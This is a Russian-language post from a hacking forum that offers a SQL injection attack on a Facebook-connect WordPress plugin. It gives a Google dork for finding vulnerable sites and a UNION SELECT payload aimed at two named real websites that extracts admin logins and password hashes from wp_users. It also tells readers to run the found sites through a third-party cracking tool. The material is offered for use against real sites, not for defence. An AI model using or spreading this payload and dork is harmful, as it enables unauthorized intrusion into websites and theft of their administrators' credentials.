1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Ломаем WordPress или теперь кнопка "Взломать" работает ;)

Тема в разделе "Софт [Все программы]", создана пользователем bios, 20 окт 2012.

  1. TopicStarter Overlay
    bios

    bios

    Регистрация:
    22 июн 2012
    Сообщения:
    539
    Симпатии:
    622
    Тип: SQL-Inj
    Плагин: Хрен его знает как он называется точно, так как пасс не подобрал) но какой-то фейсбуковский)
    Dork: inurl:"fbconnect_action=myhome"
    Собственно PoC:
    Код:
    http://www.sociable.es/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(u ser_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+fr om+wp_users--
    или
    Код:
    http://binaries.ru/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(u ser_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+fr om+wp_users--
    ======================================================================
    Вбиваем в гугл inurl:"fbconnect_action=myhome"
    Выбираем уязвимые сайты и вставляем в прогу.
    [​IMG]
    если все ОК то вы увидите логин и хэш админа
    [​IMG]
    Автор прожки Kuteke
    Please login or register to view links
     
    • Like Like x 1
    Метки:

Поделиться этой страницей

Загрузка...